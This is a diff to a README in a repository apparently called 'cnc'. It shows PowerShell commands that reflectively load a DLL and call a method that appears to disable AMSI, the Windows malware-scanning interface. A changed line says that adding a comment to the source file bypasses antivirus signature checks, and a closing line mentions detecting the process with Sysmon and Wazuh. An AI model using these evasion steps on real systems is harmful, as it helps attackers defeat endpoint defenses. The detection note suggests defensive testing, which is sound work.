smartiotil/cnc/README.md

 [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\\Source.dll"))
 [BP.AMS]::Disable()

-#If the AV blocks the source.dll file , you need only need to add comment like // to your source.cs, its will bypass AV signature check.
+#If your AV blocks the source.dll file , you only need to add comment like // to your source.cs, its will bypass AV signatures test.

 #detect powershell process using sysmon and wazuh